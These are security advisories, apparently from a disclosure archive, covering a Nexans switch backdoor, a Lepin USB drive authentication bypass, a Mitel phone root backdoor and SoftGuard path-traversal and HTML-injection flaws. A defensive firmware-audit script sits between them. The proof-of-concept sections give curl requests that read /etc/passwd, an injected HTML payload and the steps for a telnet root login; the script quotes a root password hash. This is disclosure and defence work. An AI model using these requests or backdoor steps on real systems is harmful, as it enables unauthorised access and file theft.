+ 0x16b),"stop",1);<br /> if (iVar6 != 0) {<br /> dropbear_server_init('\0'); <---<br /> netbuf_fwd_sprintf(param_1,"Stopping dropbear...\r\n");<br /> return;<br /> }<br /> netbuf_fwd_sprintf(param_1,"Uknown dropbear command...\r\n");<br /> return;<br />[...]<br />-------------------------------------------------------------------------------<br />The mentioned library is used in the CLI program that is running on the device.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following firmware versions have been tested:<br /><br />* Nexans FTTO GigaSwitch HW Version 5 (all industrial/office switches) / Firmware 6.02L<br />* Nexans FTTO GigaSwitch HW Version 5 (all industrial/office switches) / Firmware 5.04M<br /><br /><br />Vendor contact 
timeline:<br />------------------------<br />2020-05-28: Contacting the vendor's PSIRT under the following link:<br /> http://www.nexans-ans.de/support/index.php?u=security_portal_sendmail<br /> No answer.<br />2020-06-08: Contacting vendor again via support.ans@nexans.com. Extended<br /> deadline by 11 days.<br />2020-06-16: Telephone call with Nexans representative. Security advisory was<br /> received. It will be reviewed to confirm the found issues.<br />2020-06-26: Telephone call with Nexans representative. Nexans is working on the<br /> reported issues and will remove the dropbear daemon as a first<br /> measure.<br />2020-08-04: Vendor stated that a fix for the outdated software components will<br /> be available in November.<br />2020-11-12: Asked for status update.<br />2020-11-16: Contact stated that firmware testing will need more time. Updates are<br /> estimated to be ready in Q1 of 2020.<br />2020-11-20: Vendor confirmed Q1 as estimated disclosure date.<br />2021-01-21: Asked for status update; vendor stated that the release with all<br /> fixes is aimed to be published end of Q1.<br />2021-03-09: Asked for status update.<br />2021-03-17: Vendor stated that the firmware is in the testing stage. The fixed<br /> firmware will be released in May.<br />2021-06-10: Asked for status update.<br />2021-06-14: Vendor stated that the firmware is not ready due to COVID19 and<br /> homeschooling. 
The fixed firmware will be released end of August.<br />2021-08-31: Asked for status update.<br />2021-09-07: Vendor stated that the fixed firmware will be ready end of 2021.<br />2022-05-23: Informed vendor that the advisory will be released mid-June 2022.<br />2022-05-24: Firmware V7.02 is available for download, which fixes most of the<br /> outdated component issues.<br />2022-06-15: Release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor provides an updated firmware here:<br />https://www.nexans-ans.de/support/firmware/<br /><br />Firmware version V6.02N has the backdoor removed and was already published a while ago.<br />Version V7.02 also has the backdoor removed and fixes most of the outdated software issues.<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. 
The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF T. Weber / @2022<br /><br /></code></pre>
<pre><code>Advisory ID: SYSS-2022-024<br />Product: EP-KP001<br />Manufacturer: Lepin<br />Affected Version(s): KP001_V19<br />Tested Version(s): KP001_V19<br />Vulnerability Type: Violation of Secure Design Principles (CWE-657)<br />Risk Level: High<br />Solution Status: Open<br />Manufacturer Notification: 2022-04-12<br />Solution Date: -<br />Public Disclosure: 2022-06-10<br />CVE Reference: CVE-2022-29948<br />Author of Advisory: Matthias Deeg (SySS GmbH)<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The Lepin EP-KP001 is a USB flash drive with AES-256 hardware encryption<br />and a built-in keypad for passcode entry.<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"[Safeguard Your Sensitive DATA] With Military Grade Full-disk 256-bit<br />AES XTS Hardware Encryption to protect your important files. All your<br />data is protected by hardware encryption, so no one can access your<br />data without knowing the password."<br /><br />Due to an insecure design, the Lepin EP-KP001 flash drive is vulnerable<br />to an authentication bypass attack which enables an attacker to gain<br />unauthorized access to the stored encrypted data.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />When analyzing the USB flash drive Lepin EP-KP001, Matthias Deeg found<br />out that it uses an insecure hardware design which allows an attacker<br />to bypass the password-based user authentication.<br /><br />The Lepin EP-KP001 consists of the following four main parts:<br /><br />1. An unknown NAND flash memory chip<br />2. An Alcor Micro flash disk controller (AU6989SNBL-GTD)<br />3. An unknown microcontroller (unmarked chip) used as keypad controller<br />4. 
A high-speed analog switch (SGM7222)<br /><br />The encrypted disk partition with the stored user data can be unlocked<br />by entering the correct passcode via the keypad and pressing the<br />"unlock" button.<br /><br />According to the performed analysis, the password-based user authentication<br />via a passcode consisting of 6 to 14 digits is performed by the unknown<br />microcontroller.<br /><br />By replacing this unknown microcontroller on a target device with one<br />from an attacker-controlled Lepin EP-KP001 whose passcode was known, it<br />was possible to successfully unlock the targeted Lepin EP-KP001 USB<br />flash drive and to gain unauthorized access to the stored data in<br />cleartext.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />A successful authentication bypass attack could be performed via the<br />following steps:<br /><br />1. Set a passcode on an attacker-controlled Lepin EP-KP001.<br /><br />2. Desolder the unmarked microcontroller from the attacker-controlled<br /> device.<br /><br />3. Desolder the unmarked microcontroller from the targeted Lepin<br /> EP-KP001.<br /><br />4. Solder the unmarked microcontroller from the attacker-controlled<br /> device on the targeted device.<br /><br />5. 
Unlock the targeted device with the initially set and known passcode.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />SySS is not aware of a security fix for the described security issue.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2022-04-12: Vulnerability reported to manufacturer<br />2022-06-10: Public release of security advisory<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for Lepin EP-KP001<br /> <br />https://www.amazon.com/Encrypted-Password-Aluminum-Portable-Protected/dp/B06W5H9GP7/<br />[2] SySS Security Advisory SYSS-2022-024<br /> <br />https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-024.txt<br />[4] SySS GmbH, SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Matthias Deeg of SySS GmbH.<br /><br />E-Mail: matthias.deeg (at) syss.de<br />Public Key: <br />https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc<br />Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. 
The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA512<br /><br />Advisory ID: SYSS-2022-021<br />Product: Mitel 6800/6900 Series SIP Phones excluding 6970<br /> Mitel 6900 Series IP (MiNet) Phones<br />Manufacturer: Mitel Networks Corporation<br />Affected Version(s): Rel 5.1 SP8 (5.1.0.8016) and earlier<br /> Rel 6.0 (6.0.0.368) to 6.1 HF4 (6.1.0.165)<br /> MiNet 1.8.0.12 and earlier<br />Tested Version(s): 6.1.0.146<br />Vulnerability Type: Hidden Functionality (Backdoor) (CWE-912)<br />Risk Level: High<br />Solution Status: Fixed<br />Manufacturer Notification: 2022-02-23<br />Solution Date: 2022-05-03<br />Public Disclosure: 2022-06-10<br />CVE Reference: CVE-2022-29854<br /> CVE-2022-29855<br />Author of Advisory: Moritz Abrell, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />Mitel Networks Corporation manufactures different IP- and SIP-based<br />desk phones.<br /><br />The manufacturer describes these products, e.g., as follows:<br /><br />"The 6900 IP Series is a powerful suite of desk phones with crystal clear<br />audio, advanced features and a broad array of accessories to improve<br />productivity and mobility in today's modern business environment."<br /><br />The firmware of several phones contains an undocumented backdoor which<br />allows an attacker to gain root access by pressing specific keys on<br />system boot.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The shell script "check_mft.sh", which is located in the directory<br />"/etc" on the phone, checks whether the keys "*" and "#" are pressed<br />simultaneously during system startup.<br /><br />The phone then sets its IP address to "10.30.102.102" and starts a<br />Telnet server. 
A Telnet login can then be performed with a static root<br />password.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />1. Identify the backdoor<br /><br />1.1. Extract the jffs2 file system from an affected Mitel firmware:<br /><br />#> binwalk -e 6867i.st<br /><br />DECIMAL HEXADECIMAL DESCRIPTION<br />- --------------------------------------------------------------------------------<br />347 0x15B Linux kernel ARM boot executable zImage (little-endian)<br />15695 0x3D4F gzip compressed data, maximum compression, from Unix, last modified: 2021-10-22 10:47:08<br />1223395 0x12AAE3 JFFS2 filesystem, little endian<br /><br /><br />1.2. Mount the jffs2 file system:<br /><br />#> modprobe jffs2<br />#> modprobe mtdram total_size=70000<br />#> modprobe mtdblock<br />#> dd if=12AAE3.jffs2 of=/dev/mtdblock0<br />#> mount -t jffs2 /dev/mtdblock0 /mnt/<br /><br /><br />1.3. The script "check_mft.sh" located in the "/etc" directory contains<br />the backdoor logic:<br /><br />#> cat /mnt/etc/check_mft.sh<br />************* content shortened ****************<br />#!/bin/sh<br /><br />case "$HOSTNAME" in<br /><br />#press and hold * # two keys at the same time<br /> <br /> "bcm911109_6867i" | "6867i" | "bcm911107_praxis_3" | "bcm911109_aquarius_3")<br /> GPIODetect=`gpio get 4`<br /> checkDhsgShorted<br /> #KEY_OUT0 (GPIO52) -> KEY_IN7 (GPIO50) "DownKey" is press<br /> isCCATest=`dbg rw 0x8000d000 8| grep "0x8000d000: 01ff 017f 01ff 01ff 01ff 01ff 01ff 01ff"`<br /> <br /> keyBoardScanMatch="True"<br /> keycombinationMatch=`dbg rw 0x8000d000 8| grep "0x8000d000: 01ff 01ff 01ff 01ff 01af 01ff 01ff 01ff"`<br /> ;;<br />esac<br /><br />echo "keyBoardScanMatch = $keyBoardScanMatch, dhsgShorted=$dhsgShorted "<br />echo "GPIODetect = $GPIODetect,keycombinationMatch=$keycombinationMatch"<br />echo "isCCATest = $isCCATest"<br /><br />if [ "$keyBoardScanMatch" -a $dhsgShorted -eq 1 -a $GPIODetect -eq "0" 
-o "$keycombinationMatch" ]; then<br /> mount -t jffs2 /dev/mtdblock3 /nvdata<br /> if [ -f $ENETCFG ]; then<br /> . $ENETCFG<br /> MAC=${ENETCFG_MAC}<br /> fi<br /><br /> /etc/if_bcm_net_setup.sh up<br /> ifconfig eth0 hw ether $MAC<br /> ifconfig eth0 10.30.102.102 netmask 255.255.255.0 up<br /> <br /> if [ -f /usr/sbin/telnetd ]; then<br /> telnetd &<br /> fi<br /> exit 255<br />fi<br />************* content shortened ****************<br /><br /><br />1.4. The file "ota_BCM911109_PRAXIS_3_voice_v6_5_jffs2.bin" located in<br />the directory "/etc" contains another jffs2 file system.<br /><br /><br />1.5. Extract and mount the file system as described in Steps 1<br />and 2.<br /><br /><br />1.6. The "check_mft.sh" in this file system also contains the root<br />password which is set by default and forced by the script:<br /><br />#> cat /mnt/etc/check_mft.sh<br />************* content shortened ****************<br />if [ -f /usr/sbin/telnetd ]; then<br /># make sure the default password is set for root.<br /> (echo (password stripped out); sleep 1; echo (password stripped out) | passwd -a A<br /> telnetd &<br />fi<br />************* content shortened ****************<br /><br /><br />2. Exploiting<br /><br />2.1. Boot the phone and press the "*" and "#" keys simultaneously.<br /><br /><br />2.2. Assign an IP address to communicate with the phone:<br /><br />#> ip addr add 10.30.102.100/24 dev eth0<br /><br /><br />2.3. 
Now, logging in to the phone as the root user with the static password<br />via Telnet is possible:<br /><br />#> telnet 10.30.102.102<br />Trying 10.30.102.102...<br />Connected to 10.30.102.102.<br />Escape character is '^]'.<br /><br />(none) login: root<br />Password:<br />10.30.102.102 # id<br />uid=0(root) gid=0(root) groups=0(root)<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />Upgrade to one of the following (or later) versions:<br />- - 5.1 SP8 HF1 (5.1.0.8017)<br />- - 6.1 HF5 (6.1.0.171)<br />- - 6.2 SP1 (6.2.0.1012)<br />- - MiNet 1.8.0.15<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2022-02-22: Vulnerability discovered<br />2022-02-23: Vulnerability reported to manufacturer<br />2022-02-24: Acknowledgement of receipt of the vulnerability report<br /> received from the manufacturer<br />2022-03-30: Consultation with the manufacturer regarding updates to fix<br /> the vulnerability<br />2022-03-30: Manufacturer confirms the vulnerability, informs about the<br /> status to fix the vulnerability and asks for an extension of<br /> the disclosure timeline<br />2022-03-31: New disclosure date set to 2022-05-10<br />2022-05-04: Asking the manufacturer for any updates regarding the<br /> vulnerability<br />2022-05-05: Manufacturer provides a patch to fix this vulnerability<br />2022-05-05: Manufacturer publishes the vulnerability and assigned CVE IDs<br />2022-05-05: Manufacturer asks for another extension of the disclosure<br /> timeline, as large parts of the phones may still be unpatched<br /> in practice<br />2022-05-05: New disclosure date set to 2022-06-10<br />2022-06-10: Public disclosure of the vulnerability<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for Mitel IP desk phones:<br /> 
https://www.mitel.com/products/devices-accessories/ip-phones-peripherals<br />[2] SySS Responsible Disclosure Policy:<br /> https://www.syss.de/en/responsible-disclosure-policy<br />[3] Vulnerability reports by the manufacturer:<br /> https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-22-0004<br /> https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-22-0003<br />[4] CVE-2022-29854:<br /> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29854<br />[5] CVE-2022-29855:<br /> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29855<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Moritz Abrell of SySS GmbH.<br /><br />E-Mail:moritz.abrell@syss.de<br />Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc<br />Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. 
The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br /><br /></code></pre>
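A defender-side check for the indicators the Nexans and Mitel advisories above describe (a hash-bearing root entry in /etc/passwd, dropbear on ports 50200/50201, telnetd and a scripted password in a boot script). This is an added example, not code from either advisory or vendor; the sample files are constructed from the quoted fragments and the password is a labelled placeholder.

```python
"""Firmware rootfs audit for backdoor indicators (added example).

Walks an extracted root filesystem and flags:
  * password hashes stored directly in /etc/passwd and extra UID-0 accounts
    (the Nexans switch shipped root:oFQzvQf5qrI56:0:0:... in /etc/passwd)
  * SSH daemons configured on non-standard ports (DROPBEAR_PORT="50200 -p 50201")
  * boot scripts that launch telnetd, pipe a password into passwd, or assign a
    hard-coded IP address (as /etc/check_mft.sh on the Mitel phones does)
"""
import re
import tempfile
from dataclasses import dataclass
from pathlib import Path

# Constructed samples, modelled on the fragments quoted in the advisories.
SAMPLE_PASSWD = (
    "root:oFQzvQf5qrI56:0:0:root:/home/root:/bin/sh\n"
    "daemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"
)
SAMPLE_DROPBEAR_INIT = (
    "DAEMON=/usr/sbin/dropbear\n"
    "NAME=dropbear\n"
    'DROPBEAR_PORT="50200 -p 50201"\n'
)
SAMPLE_CHECK_MFT = (
    "#!/bin/sh\n"
    "ifconfig eth0 10.30.102.102 netmask 255.255.255.0 up\n"
    "if [ -f /usr/sbin/telnetd ]; then\n"
    "    # PASSWORD_PLACEHOLDER stands in for the static password stripped from the advisory\n"
    "    (echo PASSWORD_PLACEHOLDER; sleep 1; echo PASSWORD_PLACEHOLDER) | passwd root\n"
    "    telnetd &\n"
    "fi\n"
)


@dataclass(frozen=True)
class Finding:
    path: str    # path inside the firmware image
    kind: str    # short indicator name
    detail: str  # the value or line that triggered it


DROPBEAR_PORT_RE = re.compile(r'DROPBEAR_PORT\s*=\s*"?([^"\n]*)')
HARDCODED_IP_RE = re.compile(r"\bifconfig\s+\S+\s+(\d{1,3}(?:\.\d{1,3}){3})")
TELNETD_START_RE = re.compile(r"(?m)^[ \t]*(?:/usr/sbin/)?telnetd\b")
PIPED_PASSWD_RE = re.compile(r"\|\s*passwd\b")


def audit_passwd(text, path="/etc/passwd"):
    """Flag UID-0 accounts other than root and any hash kept in the passwd file itself."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        fields = line.split(":")
        if line.startswith("#") or len(fields) < 7:
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append(Finding(path, "extra-uid0-account", f"{name} (line {lineno})"))
        # 'x' or '*' defer to /etc/shadow and '!'-prefixed values are locked; anything else is a hash
        if pw and pw not in ("x", "*") and not pw.startswith("!"):
            findings.append(Finding(path, "hash-in-passwd", f"{name} (line {lineno})"))
    return findings


def audit_script(text, path):
    """Flag backdoor-style service setup in an init or boot script."""
    findings = []
    m = DROPBEAR_PORT_RE.search(text)
    if m:
        for port in re.findall(r"\d+", m.group(1)):
            if int(port) != 22:
                findings.append(Finding(path, "ssh-nonstandard-port", port))
    for ip in HARDCODED_IP_RE.findall(text):
        findings.append(Finding(path, "hardcoded-ip", ip))
    if TELNETD_START_RE.search(text):
        findings.append(Finding(path, "telnetd-start", "telnetd launched from script"))
    if PIPED_PASSWD_RE.search(text):
        findings.append(Finding(path, "scripted-password-set", "password piped into passwd"))
    return findings


def audit_rootfs(root):
    """Audit /etc/passwd, every file in /etc/init.d and every /etc/*.sh under ROOT."""
    root = Path(root)
    findings = []
    passwd = root / "etc" / "passwd"
    if passwd.is_file():
        findings += audit_passwd(passwd.read_text(errors="replace"))
    candidates = []
    init_d = root / "etc" / "init.d"
    if init_d.is_dir():
        candidates += sorted(init_d.iterdir())
    if (root / "etc").is_dir():
        candidates += sorted((root / "etc").glob("*.sh"))
    for script in candidates:
        if script.is_file():
            rel = "/" + script.relative_to(root).as_posix()
            findings += audit_script(script.read_text(errors="replace"), rel)
    return findings


def build_sample_rootfs():
    """Write the constructed samples into a temporary rootfs and return its path."""
    root = Path(tempfile.mkdtemp(prefix="fw-audit-"))
    (root / "etc" / "init.d").mkdir(parents=True)
    (root / "etc" / "passwd").write_text(SAMPLE_PASSWD)
    (root / "etc" / "init.d" / "dropbear").write_text(SAMPLE_DROPBEAR_INIT)
    (root / "etc" / "check_mft.sh").write_text(SAMPLE_CHECK_MFT)
    return root


if __name__ == "__main__":
    for f in audit_rootfs(build_sample_rootfs()):
        print(f"{f.kind:24} {f.path:22} {f.detail}")
```

Point `audit_rootfs` at a directory produced by binwalk or a mounted jffs2 image to run it against a real firmware.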
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220609-0 ><br />=======================================================================<br /> title: Multiple vulnerabilities<br /> product: SoftGuard SNMP Network Management Extension<br /> vulnerable version: SoftGuard Web (SGW) < 5.1.5<br /> fixed version: SoftGuard version 5.1.5 from 2022-06-01<br /> CVE number: CVE-2022-31201, CVE-2022-31202<br /> impact: High<br /> homepage: https://gravitate.eu (reseller)<br /> found: 2022-04-14<br /> by: Philipp Espernberger (Office Linz)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />There is no public description available for this vendor/product. The following<br />description was provided as documentation:<br /><br />"SoftGuard is a network management extension which collects inventory-, analysis-<br />and debugging data of devices and networks at least once a day. SoftGuard has an<br />open structure, is built simple, is easily expandable, easy to use and is laid out<br />for large scale networks. The data collection is performed with the protocols SNMP<br />supporting the versions 1, 2c and 3. Additional protocols like ssh, telnet, rsh,<br />https, NetBIOS/IP, ICMP ... 
complemented by SNMP if required.<br /><br />The SoftGuard Suite consists of three parts:<br /><br />* SoftGuard Network Center (SNC)<br />* SoftGuard Host Center (SHC)<br />* SoftGuard Monitor Center (SMC)<br /><br />Additionally there are a bunch of common and customer specific expansions like<br />SoftGuard Web (SGW), SoftGuard Statistic Tool (SST), Port Configuration Tool (PCT),<br />Network Access Points (NAP), Technician Access Point (TAP), etc."<br /><br /><br />Business recommendation:<br />------------------------<br />SEC Consult recommends updating to the latest version of SoftGuard (network management<br />extension).<br /><br />An in-depth security analysis performed by security professionals is highly<br />advised to identify and resolve potential further critical security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) File System Access (CVE-2022-31202)<br />The export function allows authenticated attackers to download any<br />arbitrary local file from the file system due to insufficient input<br />validation. The unfiltered URL parameter "query" enables an attacker to<br />access arbitrary local files, as it lets the attacker define the<br />complete path and the filename. Files that include passwords<br />and other sensitive information can be accessed.<br />Furthermore, the built-in man functionality also allows attackers to<br />read any arbitrary local file from the file system.<br /><br />2) HTML Injection (CVE-2022-31201)<br />Various components do not properly sanitize/encode user input. This<br />leads to HTML injection vulnerabilities. By exploiting this vulnerability,<br />an attacker can include arbitrary HTML into the affected web page. The<br />code is executed in the context of the victim's browser when visiting<br />the manipulated URL. 
The vulnerability can be used to change the contents<br />of the displayed site or redirect to other sites.<br /><br />During the security assessment it was not possible to execute JavaScript<br />code because the security headers Content-Security-Policy and<br />X-Content-Type-Options prevent the execution.<br /><br /><br />Proof of concept:<br />-----------------<br />1) File System Access (CVE-2022-31202)<br />1a) Export functionality<br />To access arbitrary local files, an authenticated user can use the export<br />function (Administration -> User -> Access -> Export). The following URL<br />was used to set the filename to /etc/passwd:<br />===============================================================================<br />https://$host:8016/sgw/export?dbs=file&db=DefUser_access_$username_db%2e<br />1649426888398872%2etmp&query=file%3a/etc/passwd'<br /><br />===============================================================================<br /><br />The newly set filename (/etc/passwd) can be exported and downloaded via the<br />execution button. 
Afterwards the content of the file gets downloaded successfully.<br />===============================================================================<br />root:x:0:0:root:/root:/bin/bash<br />bin:x:1:1:bin:/bin:/sbin/nologin<br />daemon:x:2:2:daemon:/sbin:/sbin/nologin<br />adm:x:3:4:adm:/var/adm:/sbin/nologin<br />lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin<br />sync:x:5:0:sync:/sbin:/bin/sync<br />mail:x:8:12:mail:/var/spool/mail:/sbin/nologin<br />ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin<br />nobody:x:99:99:Nobody:/:/sbin/nologin<br />systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin<br />dbus:x:81:81:System message bus:/:/sbin/nologin<br />[...]<br />===============================================================================<br /><br />1b) MAN functionality<br />The following curl command shows how an authenticated attacker can gain access<br />to any arbitrary local file:<br />===============================================================================<br />curl 'https://$host:8016/cgi-bin/man.tcl' -H 'Authorization: Basic [...]'<br />--data 'act=1&x=%2Fetc%2Fpasswd&submit=Execute' --compressed --insecure<br /><br />===============================================================================<br /><br />The curl response includes the contents of the file:<br />===============================================================================<br /><!DOCTYPE html><br /><html lang="en"><head><meta charset="UTF-8" /><br />[...]<br /><pre><br />root:x:0:0:root:/root:/bin/bash<br />bin:x:1:1:bin:/bin:/sbin/nologin<br />daemon:x:2:2:daemon:/sbin:/sbin/nologin<br />adm:x:3:4:adm:/var/adm:/sbin/nologin<br />lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin<br />sync:x:5:0:sync:/sbin:/bin/sync<br />mail:x:8:12:mail:/var/spool/mail:/sbin/nologin<br />ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin<br />nobody:x:99:99:Nobody:/:/sbin/nologin<br />systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin<br />dbus:x:81:81:System message 
bus:/:/sbin/nologin<br />[...]<br />===============================================================================<br /><br />2) HTML Injection (CVE-2022-31201)<br />When a new graph is created an authenticated attacker controls the GET parameters<br />and can inject malicious content. The following curl command shows how an<br />authenticated attacker can inject HTML code:<br />===============================================================================<br />curl 'https://$host:8016/sgw/graph?tbl=sgNode&t=percent&h=Status%3Ch1%3ESEC-<br />Consult%3C/h1%3E+%23&v=%7bdown+1934+orange%7d+%7bicmp+555+red%7d+%7bsnmpaaaa+8723+green%7d&scale=5'<br />-H 'Authorization: Basic [...]' --compressed --insecure<br /><br />===============================================================================<br /><br />The curl response includes the injected HTML code <h1>SEC Consult</h1>:<br />===============================================================================<br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"/><br /> <title>SGW - Graph: Node</title><br />[...]<br /></head><br /><body class="master"><br /> [...]<br /> <caption>∑3, Status<h1>SEC Consult</h1>, #11212</caption><br /> [...]<br /> <tr><td>Status<h1>SEC Consult</h1></td><br />[...]<br /></body></html><br />===============================================================================<br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested and found to be vulnerable:<br />* SoftGuard Web (SGW) 5.1.3<br /><br />The vendor provided the following information regarding the affected versions:<br /><br />1a) affected version 4.5.0 (2019-05-04) to version 4.5.8 (2020-05-05)<br />1b) since SoftGuard 2.0 with SoftGuard Web 1.0 (~1998/99)<br />2) since SoftGuard 3.6.0 (2009-10-31) / SoftGuard 3.6.6 (2011-02-15) with<br /> SoftGuard Web 2.6.0/2.6.6<br /><br /><br />Vendor contact timeline:<br />------------------------<br 
/>2022-05-11: Contacting vendor through direct email address.<br />2022-05-11: Sent encrypted security advisory to vendor.<br />2022-05-12: Received feedback from the vendor for the security advisory.<br />2022-05-16: Received confirmation that a new version of SoftGuard was<br /> already rolled out to the customers which included the fix.<br />2022-05-16: Received additional information about which versions are vulnerable.<br />2022-05-19: Received CVE numbers.<br />2022-05-20: Reviewed the fixed version 5.1.4 and found that HTML injection<br /> still works at other endpoints; other issues are fixed.<br />2022-05-20: Vendor replies that new version 5.1.5 will be released on 1st June.<br />2022-06-01: Vendor releases patched version 5.1.5.<br />2022-06-09: Coordinated release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor rolled out new software versions. Affected users should verify that<br />they are using the latest version available (5.1.5 from 2022-06-01 or higher).<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br 